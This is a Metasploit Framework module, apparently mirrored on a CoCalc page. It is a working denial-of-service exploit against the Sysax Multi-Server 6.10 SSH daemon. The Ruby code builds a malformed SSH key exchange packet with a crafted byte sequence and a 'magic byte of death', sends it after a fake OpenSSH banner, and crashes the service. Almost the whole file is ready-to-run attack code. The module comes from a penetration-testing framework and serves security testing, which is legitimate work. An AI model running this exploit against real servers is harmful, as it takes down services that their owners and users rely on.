CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb
Views: 11789
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(update_info(info,

12
      'Name'           => 'Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service',

13
      'Description'    => %q{

14
          This module sends a specially-crafted SSH Key Exchange causing the service to

15
        crash.

16
      },

17
      'Author'         => 'Matt "hostess" Andreko <mandreko[at]accuvant.com>',

18
      'License'        => MSF_LICENSE,

19
      'References'     =>

20
        [

21
          [ 'OSVDB', '92081'],

22
          [ 'URL', 'https://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html']

23
        ],

24
      'DisclosureDate' => '2013-03-17'))

25


26
    register_options(

27
      [

28
        Opt::RPORT(22),

29
        OptString.new('CLIENTVERSION', [ true, 'The SSH client version to report.', 'Debian-5ubuntu1'])

30
      ])

31


32
  end

33


34
  def get_packet

35


36
    delimiter = "\x00"*3

37
    packet = [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,

38
              0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,

39
              0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,

40
              0x00, 0x7e].pack("C*")

41
    packet << Rex::Text.rand_text_alphanumeric(126)

42
    packet << delimiter

43
    packet << Rex::Text.rand_text_alphanumeric(16)

44
    packet << delimiter

45
    packet << Rex::Text.rand_text_alphanumeric(158)

46
    packet << delimiter

47
    packet << Rex::Text.rand_text_alphanumeric(158)

48
    packet << delimiter

49
    packet << Rex::Text.rand_text_alphanumeric(106)

50
    packet << delimiter

51
    packet << Rex::Text.rand_text_alphanumeric(106)

52
    packet << delimiter

53
    packet << "\x28" # Magic byte of death - seems to work with just about

54
            # anything except \x1a, the value it's supposed to be

55
    packet << Rex::Text.rand_text_alphanumeric(26)

56
    packet << delimiter

57
    packet << Rex::Text.rand_text_alphanumeric(27)

58
    packet << delimiter*7

59
  end

60


61
  def run

62


63
    connect

64


65
    banner = sock.get_once || ''

66
    print_status("Banner: #{banner.strip}")

67
    sock.put("SSH-2.0-OpenSSH_5.1p1 " + datastore['CLIENTVERSION'] + "\r\n" + get_packet())

68


69
    # Sometimes the socket closes faster than it can read, sometimes it doesn't, so catch the error just in case.

70
    begin

71
      sock.get_once

72
    rescue Errno::ECONNRESET

73
    end

74


75
    disconnect

76
  end

77
end

78


79